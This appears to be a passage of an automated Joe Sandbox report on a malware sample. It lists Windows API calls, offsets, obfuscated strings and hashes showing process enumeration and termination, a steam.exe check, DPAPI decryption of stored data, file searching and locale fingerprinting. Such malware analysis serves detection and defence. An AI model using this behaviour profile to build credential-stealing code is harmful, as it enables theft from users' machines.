                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00522486
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: \*.*
                          • API String ID: 2567437900-1173974218
                          • Opcode ID: c7152a906c6b6c28977d65c7e83e7414ba037e40ee8855371c48bcaef62eab38
                          • Instruction ID: eacc5960e6691b24d1934a64ceec2e5c354af099600eb575a8b32c81f8b67e33
                          • Opcode Fuzzy Hash: c7152a906c6b6c28977d65c7e83e7414ba037e40ee8855371c48bcaef62eab38
                          • Instruction Fuzzy Hash: D8419E3455021A9BEB32FF68EC89ADE7FA5BF92300F005124F94A97251CB749DD18F90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: "*w$$u;$7HwO$IiO$[|?n$]kW^$c{$js}$x;_$u}
                          • API String ID: 0-3523132699
                          • Opcode ID: eaa862e35faaa9a79073326625cec62ef80ce9d5c76fa52c3ac66c95ea931cc2
                          • Instruction ID: e1d950b8dfb831c0c2b4f925b74e1a2865141a6d3208ecaca9eda52052a9a466
                          • Opcode Fuzzy Hash: eaa862e35faaa9a79073326625cec62ef80ce9d5c76fa52c3ac66c95ea931cc2
                          • Instruction Fuzzy Hash: 87B202F360C6049FD3086E2DEC8567AFBE9EF94620F1A493DEAC4C7744EA3558018696
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 005346B9
                          • Process32First.KERNEL32(00000000,00000128), ref: 005346C9
                          • Process32Next.KERNEL32(00000000,00000128), ref: 005346DB
                          • StrCmpCA.SHLWAPI(?,?), ref: 005346ED
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00534702
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00534711
                          • CloseHandle.KERNEL32(00000000), ref: 00534718
                          • Process32Next.KERNEL32(00000000,00000128), ref: 00534726
                          • CloseHandle.KERNEL32(00000000), ref: 00534731
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 3836391474-0
                          • Opcode ID: 474e2892090309d5820858341a65460cd09ef0eac9c45195cf4ea570e9603728
                          • Instruction ID: 4da82905f7d071c52e4aafd5184ddc9c540d9d0e4d004713124fb6d991eb2e69
                          • Opcode Fuzzy Hash: 474e2892090309d5820858341a65460cd09ef0eac9c45195cf4ea570e9603728
                          • Instruction Fuzzy Hash: AA01A1355011156BE7205B609C89FFF3B7CEB46B01F04418AFA0592090EF78A9858A69
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: %:~$&nk$4g}$Hwu$T2y2$fdmQ$mk$mz$vH
                          • API String ID: 0-3812669263
                          • Opcode ID: 6c8bc74ee3d706773b2a7a36bfb0beecf9ea7d66e25c07958e277ce0d52b3fba
                          • Instruction ID: 58f17cb2f6779baf9126f3dbe7bf0a3c06ac3a8179af49417600678f5fecf488
                          • Opcode Fuzzy Hash: 6c8bc74ee3d706773b2a7a36bfb0beecf9ea7d66e25c07958e277ce0d52b3fba
                          • Instruction Fuzzy Hash: C2B2D5F360C2049FE704AE29EC8567ABBE5EF94320F16893DE6C4C7744EA3598418797
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00534628
                          • Process32First.KERNEL32(00000000,00000128), ref: 00534638
                          • Process32Next.KERNEL32(00000000,00000128), ref: 0053464A
                          • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00534660
                          • Process32Next.KERNEL32(00000000,00000128), ref: 00534672
                          • CloseHandle.KERNEL32(00000000), ref: 0053467D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                          • String ID: steam.exe
                          • API String ID: 2284531361-2826358650
                          • Opcode ID: 63bd55527a6ce7510dce265fcc44aadc2084a3355a871a705bb617002a88a0eb
                          • Instruction ID: c908304f876f12225a7b55b9f194e61fad1d932bdbaa5ae5d1989b8616f16306
                          • Opcode Fuzzy Hash: 63bd55527a6ce7510dce265fcc44aadc2084a3355a871a705bb617002a88a0eb
                          • Instruction Fuzzy Hash: 190162756011299BD7209F60AC49FEB7BBCEF0A750F0441D6EA08D1050EF78D9948FE9
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00524B51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00524B74
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00524B7F
                          • lstrlen.KERNEL32(00544CA8), ref: 00524B8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00524BA7
                          • lstrcat.KERNEL32(00000000,00544CA8), ref: 00524BB3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00524BDE
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00524BFA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID:
                          • API String ID: 2567437900-0
                          • Opcode ID: 333070a6ddd4dd057799d72c289ae0243ad0819f49099b0f1fcf9f51fd090633
                          • Instruction ID: fcdb8d6c3ec802389560c2dc482b85ee3d07bb29f183830dcff6ae08f4c0710b
                          • Opcode Fuzzy Hash: 333070a6ddd4dd057799d72c289ae0243ad0819f49099b0f1fcf9f51fd090633
                          • Instruction Fuzzy Hash: 7E316D3156151A9BEB22EF68EC89ADE7FB6BF82700F005125F80597251CB74DC918F90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: $aw$9?V}$RyoM$Vs4$WR?$~r=$iO2$p[
                          • API String ID: 0-1032414269
                          • Opcode ID: ccdc44161f89472643b1584cf5ef1931211a8a4995da88b0269a4be9cfb29188
                          • Instruction ID: 0db2fa56ec4b640dfd81d50d75562c863f5e8fea5aad44442814748c9ced1f0a
                          • Opcode Fuzzy Hash: ccdc44161f89472643b1584cf5ef1931211a8a4995da88b0269a4be9cfb29188
                          • Instruction Fuzzy Hash: F2B206F3A082109FE304AE2DDC8566AFBE9EFD4720F1A493DE6C4D7344EA7558018697
                          APIs
                            • Part of subcall function 005371E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 005371FE
                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00532D9B
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00532DAD
                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00532DBA
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00532DEC
                          • LocalFree.KERNEL32(00000000), ref: 00532FCA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: b0bb47edc29d145cb250e17fe75cda1d32ace56b382b7b72030eea99d06daca9
                          • Instruction ID: f1fe8c7972f06448212002de7fd57e68d4506d34a3fc8d27d4a57fba0ebacb39
                          • Opcode Fuzzy Hash: b0bb47edc29d145cb250e17fe75cda1d32ace56b382b7b72030eea99d06daca9
                          • Instruction Fuzzy Hash: A1B13D74904609CFD715CF18C949BA9BBF5FF44325F29C1AAD4089B2A6D7769C82CF80
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: #9m]$#9m]$'Uz?$Lxo$xC_W$H|
                          • API String ID: 0-3479744152
                          • Opcode ID: 61c2cbc60ad5f4acf7e0d327c49fd6b35eb3de96ced2c0dea614992bfbccda1b
                          • Instruction ID: 63281005f5a34e5d4a17a72e9e353b45b99f30779520ba364f51bf2a2e36fdd7
                          • Opcode Fuzzy Hash: 61c2cbc60ad5f4acf7e0d327c49fd6b35eb3de96ced2c0dea614992bfbccda1b
                          • Instruction Fuzzy Hash: 7AB24BF36082049FE304AE2DEC8567AFBEAEFD4720F1A853DE6C4C7744E93558058696
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00532C42
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00532C49
                          • GetTimeZoneInformation.KERNEL32(?), ref: 00532C58
                          • wsprintfA.USER32 ref: 00532C83
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID: wwww
                          • API String ID: 3317088062-671953474
                          • Opcode ID: 5b2d711874c0f7e61e3a0caaa90f33db8b344ceffeec031b958c6bdbae86e5a8
                          • Instruction ID: 2363dd8ecab91be80987e608d9dc67a6eedf09fc66a1f7c4be1a9849deefdc42
                          • Opcode Fuzzy Hash: 5b2d711874c0f7e61e3a0caaa90f33db8b344ceffeec031b958c6bdbae86e5a8
                          • Instruction Fuzzy Hash: B8012B75A00604ABD7188F58DC4AFAEBB6DEB85721F00832AF915D77D0D7741D0486D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: /*{$8o>$PY;$X%y3$b9Bu
                          • API String ID: 0-2722733600
                          • Opcode ID: 8df73b603e845da6a2223b3103fbca0ac9ecd2eb80071b1e7d96c34dac97c1f7
                          • Instruction ID: 59c09b2178a188cf2b313484e41a8daa5593b30cdae8b480403ceda72e4c76f8
                          • Opcode Fuzzy Hash: 8df73b603e845da6a2223b3103fbca0ac9ecd2eb80071b1e7d96c34dac97c1f7
                          • Instruction Fuzzy Hash: 00B23CF36082049FE304AE2DEC8567AF7E9EFD4720F1A463DE6C4C7744EA3558058696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 7^yl$A]w'$D5o$aR>;$u"w
                          • API String ID: 0-1063973768
                          • Opcode ID: 32f8f6c0b9ba4cc1095f058c376bed10784ff9d71e2c0691e6a9ba4b3fa4b811
                          • Instruction ID: 5ba5a6eed3c671e49b5e6d7a7f1695a0691b398512e65d066249751940e52c05
                          • Opcode Fuzzy Hash: 32f8f6c0b9ba4cc1095f058c376bed10784ff9d71e2c0691e6a9ba4b3fa4b811
                          • Instruction Fuzzy Hash: 22B2F7F36082049FE304AE2DEC8566AFBE6EFD4720F1A853DE6C4C7744EA3558058697
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !G{m$-i{$0Ru*$d~}$kgfS
                          • API String ID: 0-2482825174
                          • Opcode ID: 28684469c9fc0870c20af3c31c22ae230f08c1c64cf6e4cf268f80c6896220f7
                          • Instruction ID: 23af3014a75d44bb4378ee37f7c732fe7042e80497d5d2167079ebca104d5e02
                          • Opcode Fuzzy Hash: 28684469c9fc0870c20af3c31c22ae230f08c1c64cf6e4cf268f80c6896220f7
                          • Instruction Fuzzy Hash: 5EB2F8F3A082049FE304AE2DED4567AFBE5EFD4720F16493DEAC4C3744EA3598058696
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0051775E
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00517765
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0051778D
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 005177AD
                          • LocalFree.KERNEL32(?), ref: 005177B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: 6b463255ba6aefeeb7da30276f4500c229b84ac46030cda0bb9942281464685a
                          • Instruction ID: 306c69a5da7a0ad975a20a24809b77c17846e39ebde890f3740306a5f66383cf
                          • Opcode Fuzzy Hash: 6b463255ba6aefeeb7da30276f4500c229b84ac46030cda0bb9942281464685a
                          • Instruction Fuzzy Hash: EE011275B403097BEB10DB949C4AFAA7B78EB45B11F108155FB05EB2D0D7B499008794
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: (N;u$:euo$IK6$cD|U
                          • API String ID: 0-915228505
                          • Opcode ID: eb227b47417d0e4ab9ef06ebcc6fc350493c4e1e18eb908d5837d0ad3fe9c46f
                          • Instruction ID: 03ff780d8ca6d3f41e1918dc733b1ac4aa36d52924b7484b9061920795acc85c
                          • Opcode Fuzzy Hash: eb227b47417d0e4ab9ef06ebcc6fc350493c4e1e18eb908d5837d0ad3fe9c46f
                          • Instruction Fuzzy Hash: 28B219F3A082009FE714AE2DEC8577ABBE9EF94320F1A453DEAC4C7744E63558058796
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: *vV$4>{$c~>$nAo
                          • API String ID: 0-2494399842
                          • Opcode ID: 16521f8bda2e7d2884d5d8ca6af63946485e54b86b224cfa357f164a50f551c8
                          • Instruction ID: 2fda3161433cad0d942c340d6f9666903fde48e76d1e30f42369597ac9581c8d
                          • Opcode Fuzzy Hash: 16521f8bda2e7d2884d5d8ca6af63946485e54b86b224cfa357f164a50f551c8
                          • Instruction Fuzzy Hash: B2921BF360C2049FE304AE2DEC8567ABBE9EFD4720F1A852DE6C5C3744E93598058697
                          APIs
                            • Part of subcall function 005371E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 005371FE
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00533A96
                          • Process32First.KERNEL32(00000000,00000128), ref: 00533AA9
                          • Process32Next.KERNEL32(00000000,00000128), ref: 00533ABF
                            • Part of subcall function 00537310: lstrlen.KERNEL32(------,00515BEB), ref: 0053731B
                            • Part of subcall function 00537310: lstrcpy.KERNEL32(00000000), ref: 0053733F
                            • Part of subcall function 00537310: lstrcat.KERNEL32(?,------), ref: 00537349
                            • Part of subcall function 00537280: lstrcpy.KERNEL32(00000000), ref: 005372AE
                          • CloseHandle.KERNEL32(00000000), ref: 00533BF7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: 4c22abb717c1d66e1b5f5f7f519e9ce854234bfdf641f450d231e1107936b729
                          • Instruction ID: 51c4bac1977aa4ec39afafadd14ab42527183100780417400d6db856c977281f
                          • Instruction Fuzzy Hash: AB81F474900209CFD725CF19D948B95BBF1FF45329F29C1AAD4089B2B2D77A9D86CB80
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0051EA76
                          • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0051EA7E
                          • lstrcat.KERNEL32(0053CFEC,0053CFEC), ref: 0051EB27
                          • lstrcat.KERNEL32(0053CFEC,0053CFEC), ref: 0051EB49
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: de4e979ac104f3ee5efe038c6641a1b4fc9c0f2451080effd2d910c8c19b5078
                          • Instruction ID: 2fd6818a229421b3b3ebe86bdca0eed43e998060aebda35ea03ae81b640e523b
                          • Instruction Fuzzy Hash: AE312B79A04119ABD710DB58EC45FEFBB7DEF85705F008166FA09E3140DBB45A04CBA6
                          APIs
